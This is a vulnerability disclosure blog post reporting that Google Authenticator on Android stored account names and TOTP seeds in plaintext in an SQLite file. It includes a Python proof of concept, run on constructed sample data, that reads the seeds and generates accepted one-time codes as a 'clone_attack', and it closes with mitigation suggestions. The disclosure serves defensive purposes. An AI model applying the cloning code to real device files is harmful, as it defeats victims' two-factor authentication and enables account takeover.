[Google Authenticator] Account and Key plaintexts are stored in a file (May 22, 2012)
I found a security issue in Google Authenticator in May 2012. I sent a paper with the details of the issue to the Google security team, but I did not get a response from them. The authenticator was upgraded last year, but I have no idea whether the issue was changed. Anyway, I am posting it before it fades from memory.
Google provides 2-step verification to make its services more secure. A user can install and use Google's OTP (One Time Password) app on their smartphone. While analyzing the authenticator on Android, I found a security issue that can be used to make a clone of the authenticator on another smartphone.
When a user registers their smartphone with the authenticator, they enter their account and key, or scan a QR code. The authenticator then starts generating one-time passwords, and the user can authenticate to Google services with a one-time credential.
< Add account >
The authenticator offers two ways to initialize an account, 'Scan barcode' and 'Manually add account'. Whichever you choose, the account and key are stored in a file. The problem is that the user account and key are stored in that file in plaintext.
The stored file is an SQLite database, and the file path is
As you can see below, the email field is the user account and the secret field is the key for the authenticator. The secret looks encrypted, but it is not: it is the base32-encoded key exactly as typed in or read from the QR code, which is all that is needed to make a clone authenticator.
< An example of stored key and secret >
If the file is copied, or the accounts and secrets are entered into the authenticator on another smartphone, we now have a clone authenticator. The duplicated authenticators generate the same one-time password at the same time, and it can be used to authenticate to Google's services.
I also checked whether the authenticator verifies the device by phone number, serial or IMEI. No device verification is applied, so a clone running on a different device is not affected at all.
< The clone OTP >
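To make the clone concrete, here is an added example (my own code for this post, not code from Google Authenticator or from Google). It builds a throwaway in-memory SQLite database whose `accounts` table layout (email, secret, counter, type) is an assumption standing in for the file copied off the device, reads the plaintext secrets back out exactly as anyone holding a copy of the file can, and derives one-time codes from them with the RFC 6238 TOTP algorithm that the app and Google's servers share. The sample rows are constructed; the first secret is the RFC 4226/6238 reference key so the codes can be checked against the published test vectors.

```python
"""Why a copied Authenticator database is a working clone (added example)."""
import base64
import hashlib
import hmac
import sqlite3
import struct
import time

# ASSUMED schema: column names follow the accounts table described in the post;
# this in-memory copy stands in for the real file pulled off the device.
ASSUMED_SCHEMA = """
CREATE TABLE accounts (
    _id     INTEGER PRIMARY KEY,
    email   TEXT NOT NULL,
    secret  TEXT NOT NULL,   -- base32 seed, stored unencrypted
    counter INTEGER DEFAULT 0,
    type    INTEGER          -- 0 = time based (TOTP), 1 = counter based (HOTP)
);
"""

# CONSTRUCTED sample rows. The first secret is "12345678901234567890" in base32,
# the reference key from RFC 4226 / RFC 6238, so its codes match the RFC vectors.
SAMPLE_ROWS = [
    ("alice@example.com", "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ", 0, 0),
    ("bob@example.com",   "JBSWY3DPEHPK3PXP", 0, 0),
]


def build_sample_db() -> sqlite3.Connection:
    """Return an in-memory database populated like a copied authenticator file."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(ASSUMED_SCHEMA)
    conn.executemany(
        "INSERT INTO accounts (email, secret, counter, type) VALUES (?, ?, ?, ?)",
        SAMPLE_ROWS,
    )
    conn.commit()
    return conn


def dump_accounts(conn: sqlite3.Connection) -> list:
    """Read every (email, secret) pair; no key, PIN or password is needed."""
    return list(conn.execute("SELECT email, secret FROM accounts ORDER BY _id"))


def hotp(secret_b32: str, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, dynamic truncation."""
    padded = secret_b32.upper() + "=" * (-len(secret_b32) % 8)
    key = base64.b32decode(padded)
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret_b32: str, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with the counter derived from the clock."""
    return hotp(secret_b32, unix_time // step, digits)


def server_accepts(secret_b32: str, code: str, unix_time: int, window: int = 1) -> bool:
    """Model the verifier: accept the code for the current step or +/- `window` steps
    of clock skew. Nothing here identifies the device that produced the code."""
    step = unix_time // 30
    return any(hotp(secret_b32, step + d) == code for d in range(-window, window + 1))


def clone_attack(conn: sqlite3.Connection, unix_time: int) -> dict:
    """Generate a code on the 'clone' for every stolen account and check whether
    the server would accept it. Returns {email: accepted}."""
    results = {}
    for email, secret in dump_accounts(conn):
        clone_code = totp(secret, unix_time)      # computed on the attacker's phone
        results[email] = server_accepts(secret, clone_code, unix_time)
    return results


if __name__ == "__main__":
    db = build_sample_db()
    now = int(time.time())
    for email, secret in dump_accounts(db):
        print(f"{email}: secret={secret} code={totp(secret, now)}")
    print(clone_attack(db, now))
```

The point the code makes is that the verifier only ever sees HMAC(secret, time step): the server cannot tell the original phone from the clone, so whoever holds the plaintext `secret` column holds the second factor. Replacing `build_sample_db()` with `sqlite3.connect()` on a file copied from a rooted device gives the same result.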
Suggestions for this issue
- Encrypt the account and key file
- Verify the device when the app starts, to check whether it is a valid device, or include a device serial in the one-time password creation process (the server would then need the same device-specific input, so enrollment has to change as well)
- Use a more secure space such as the SIM or TrustZone to prevent malicious access (in Korea, OTP apps for banks and the financial sector are stored and executed on the SIM card)